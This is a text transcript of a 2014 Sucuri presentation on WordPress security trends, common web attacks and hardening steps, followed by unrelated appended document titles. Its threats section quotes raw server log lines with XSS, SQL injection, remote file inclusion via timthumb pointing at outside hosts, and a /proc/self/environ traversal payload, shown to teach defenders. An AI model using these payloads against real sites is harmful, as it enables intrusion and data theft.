Website Security - Latest and Greatest (WordPress 2014)

Latest and Greatest Website Security (WordPress)

04/07/2023

# WHOIS PEREZBOX

Sucuri, Inc. @sucuri_security @perezbox

Specialization: Website Security Incident Handling

Special Interests: Brazilian JiuJitsu

Tony Perez | @perezbox | @sucuri_security 2

04/07/2023

Website Security Company

Global Operations

Platform Agnostic (i.e., Joomla, WordPress, etc..)

Scan 2M Unique Domains a Month

Block 4M web attacks a Month

Remediate 400 – 500 websites a day

Signature / Heuristic Based

24/7 operations

04/07/2023

Today’s Discussion

Trends Threats Defenses

04/07/2023

Trends

04/07/2023

2013 – Year of the Mega Breach

Data Breaches (Millions)

2011 2013

04/07/2023

Anatomy of Malicious Websites

Malicious WebsitesLegitimate Websites

04/07/2023

Legitimate Websites

Not-ExploitableExploitable

1 in 8 - Critical Vulnerability

04/07/2023

Ransomware Explosion

Ransomware

2012 2013

04/07/2023

Malware Distribution

ncludes

pt Inclu

SPAM Injec

Obfusc

Script

Conditi

Redire

Deface

19%16% 14%

04/07/2023

Malicious Links

Malicious

Social Media

Email Links Website

Text Messag

04/07/2023

Spear Phishing / Phishing Increase

93% Increase in 2013

04/07/2023

Beyond The Application Layer

Darkleech

Cdork (Apache

Ebury (SSH)

Email Server (SPAM)

Going Deeper than the application layer, targeting the server.

Server Polymorphism – a.k.a highly adaptive / sophistication

Heartbleed

(OpenSSL)

04/07/2023

HeartBleed

04/07/2023

Search Engine Poisoning (SEP) Pharmacy Payday Loans

04/07/2023

Automated Attacks

WP-ADMIN

Themes /

PluginsPayloa

Exploiting Access Control

04/07/2023

Soup Kitchen Servers

Site 1

Site 2Site 3

Site 4

Cross-Site Contamination

04/07/2023

Drive By Downloads

04/07/2023

Targeting Zero Days

04/07/2023

Targeting Mobile Devices

04/07/2023

Google is On Fire

04/07/2023

Brute Force Attacks

04/07/2023

Denial of Service (DOS)

04/07/2023

Brute Force vs Denial of Service

04/07/2023

Trust Erosion

04/07/2023

There’s a Tool for that Explosion in the Malware

as a Service (MaaS) trade Yes, pay someone to hack

for you

Different tools to break in and generate payloads Brute force and

vulnerability exploits Malware Payloads

Blackhole Exploit Author Arrested

04/07/2023

Exploit kit Market in Flux

9%1%10%

10%5% Neutrino

Unknown KitRedkitSweetOrangeStyxGlazunov/SibhostNuclearBlackhole/CoolOther

04/07/2023

Don’t Worry, Everyone is a “Target”

04/07/2023

Threats

04/07/2023

Anatomy of Web Attacks

Recon Identify Attack Decisions Sustain

Use for malware? Burrow into network? Steal data?

What kind of website do you have?

04/07/2023

Five Stages of an Attack

04/07/2023

Cross-Site Scripting (XSS)

38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"

123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268

Stored Reflective

04/07/2023

iFrame Injections

04/07/2023

[02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffective.com%2Fcrotz.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0”

83.170.99.221 - - [03/Apr/2013:13:03:16 -0400] "GET /results/chinchedbistro.com&sa=U&ei=vGBcUYS1IcOaiQLxu4HIBg&ved=0CCYQFjAE&usg=AFQjCNFN1APEnX9-WPS337kMyPUz0yDM8A/wp-content/themes/vulcan/lib/scripts/thumb.php?src=http://wordpress.com.4creatus.com/info.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6”

82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

Remote / Local File Inclusion (RFI)

04/07/2023

SQL Injection

62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0 (Windows NT;en-us) Firefox/3.5.9”

04/07/2023

Spear Phishing

04/07/2023

Backdoors

04/07/2023

Free is not always Free http://blog.sucuri.net/2014/03/unmasking-free-pr

emium-wordpress-plugins.html

- SEOPresser- Payload located: wp-content/plugins/seo-pressor(gratuit)- File: central.class.php

- Flat Skins Pack Extension- Payload located: wp-content/restrict-content-pro/includes/- File: sidebar.php

- Restrict Content Pro- Paylaod located: wp-content/ubermenu-skins-flat

04/07/2023

What’s all this mean?

Brand Reputation Legal Implications Impact to Sales Blacklisted by

Search Engines Blacklisted by

Payment processors Worst Day Of your

04/07/2023

Defenses

04/07/2023

Our Insight Come From

Sucuri properties suffer: ~125,000 web based

attacks a month on average

~4,000 attacks a day▪ This spikes on occasion

Doesn’t include server level attacks

All flavors of attacks

04/07/2023

Areas to Focus On

Principles Access Control Vulnerabilities

04/07/2023

Manage your expectations

“It’s about risk reduction… risk will never be zero…”

04/07/2023

Defense in Depth

“…a concept in which multiple layers of security controls (defenses) are placed throughout an information

technology (IT) system. Its intent is to provide redundancy in the event a

security control fails or a vulnerability is exploited…”

04/07/2023

Access – P@ssw0rd

Passwords

Complex – Long - Unique

04/07/2023

Sample Usernames Used

04/07/2023

Sample Passwords Used

04/07/2023

Access Control

• https://getclef.com/ | @getclef

04/07/2023

Principle of Least Privileged

“requires that in a particular abstraction layer of a computing

environment, every module (such as a process, a user or a program

depending on the subject) must be able to access only the information

and resources that are necessary for its legitimate purpose.”

04/07/2023

Disable PHP Execution

PHP Execution, disable it:

/wp-includes /wp-content /themes /plugins /uploads

04/07/2023

Disable Plugin / Theme Editor WP-CONFIG File Modification

#Disable Plugin / Theme EditorDefine(‘DISALLOW_FILE_EDIT’,true);

04/07/2023

Ensure Integrity of Connection

• https://www.getcloak.com/ | @getcloak

04/07/2023

Please Backup

04/07/2023

Stay Current (Update)

NOT THAT HARD!!!!

04/07/2023

Software Vulnerabilities Stay current with the latest

vulnerabilities: Secure -

http://wordpress.org/plugins/secure/

04/07/2023

Brute Force Protection Local Protection

https://bruteprotect.com/ | @BruteProtect

04/07/2023

Website Firewalls

• Stay ahead of Software Vulnerabilities

04/07/2023

Biggest Weakness / Vulnerability

04/07/2023

Simple Steps to Risk Reduction

1. Employ Website Firewall

2. Don’t let WordPress write to itself

3. Filter Access by IP 4. Use a dedicated

server / VPS5. Monitor all Activity

(Logging)6. Enable SSL for

transactions7. Keep environment

current (patched)8. No Soup Kitchen

Servers

Ideal implementations:

1. Connect Securely – SFTP / SSH

2. Authentication Keys / wp-config

3. Use Trusted Sources4. Use a local Antivirus – MAC

too5. Permissions - D 755 | F 6446. Least Privileged Principles7. Accountability8. Backups – Include Database

The Bare Minimum:

04/07/2023

10 Stupid Mindsets / Actions1. Fix index.php file and assume all is fine.

2. Panic your way into WordPress Forums after hack.

3. Don’t worry about updating.

4. Trust third-party extensions.

5. Apply all upgrades on live site.

6. Install and forget, all is well with your new site.

7. Use the same username and password for everything.

8. Don’t waste time making security adjustments to PHP and settings.

9. No regular backups required.

10. Use the cheapest host.

04/07/2023

Notable Resources

Name Tool

Sucuri Blog http://blog.sucuri.net

Sucuri TV http://sucuri.tv

Malware Scanner http://sitecheck.sucuri.net

Malware Scanner http://unmaskparasites.com

Badware Busters https://badwarebusters.org

Google Forums http://productforums.google.com/forum/#!categories/webmasters/malware--hacked-sites Google Webmaster Tools http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633 Secunia Security Advisories http://secunia.com/community/advisories/search/?search=wordpress

Exploit-DB http://www.exploit-db.com/search/?action=search&filter_description=Wordpress&filter_platform=31 WordPress Hacked FAQ http://codex.wordpress.org/FAQ_My_site_was_hacked

WordPress Hardening http://codex.wordpress.org/Hardening_WordPress

04/07/2023

Questions?

Sucuri, Inc.Tony Perez

http://sucuri.nethttp://blog.sucuri.net

@perezbox | @sucuri_security

Slides: http://www.slideshare.net/perezbox/website-security-its-about-the-basics-wordpress-

Website Security - Latest and Greatest (WordPress 2014)

Services

Transcript of Website Security - Latest and Greatest (WordPress 2014)

THE LATEST AND GREATEST FROM L3 ... - L3Harris Geospatial

On Now! Latest and Greatest - BedshedGreatestCat_Sept...On Now! Latest and Greatest Spring Catalogue Sale 2013 ... this suite boasts a classic ... Ensembles pictured for illustration

Atlassian - The latest and greatest early 2013

The Latest and Greatest in Reducing Pulmonary Complicationsweb2.facs.org/download/Sweeney.pdfThe Latest and Greatest in Reducing Pulmonary Complications John F. Sweeney, MD W. Dean

Latest and Greatest from Ace Designs 2017

The latest and greatest STAAR © 2011 REGION XIII.

Crosby Digital Showcase highlights our latest and greatest.

The Latest & Greatest in Benchmarks

The Latest and Greatest in HCR Developments

CA Service Virtualization 9.0—What's the Latest and Greatest

Cardiac Drugs :The Latest and Greatest - Wallace State

Latest & Greatest Multimedia Applications for Journalists 2012

September 16, 2016 Cubs.com Latest, greatest: Cubs clinch NL …mlb.mlb.com/documents/7/4/0/201667740/September_16_74... · 2020. 4. 20. · September 16, 2016 Cubs.com Latest, greatest:

ASHRAE's Latest and Greatest Hits

SHARE_Session 14141_DFSMS Latest and Greatest

Color Wheel & Schemes The Latest & The Greatest!.

Latest and Greatest zOS V2.3 - GSE Homepageconferences.gse.org.uk/attachments/presentations/... · The Latest and Greatest z/OS Release is Here: V2R3! ... zFS dynamic attribute changes,

LATEST – GREATEST INVENTOR LESSON PLAN INDUSTRY ...

My latest and greatest Listing Presentation

Welcome to the Latest and Greatest (?) Deliberate Practice Review.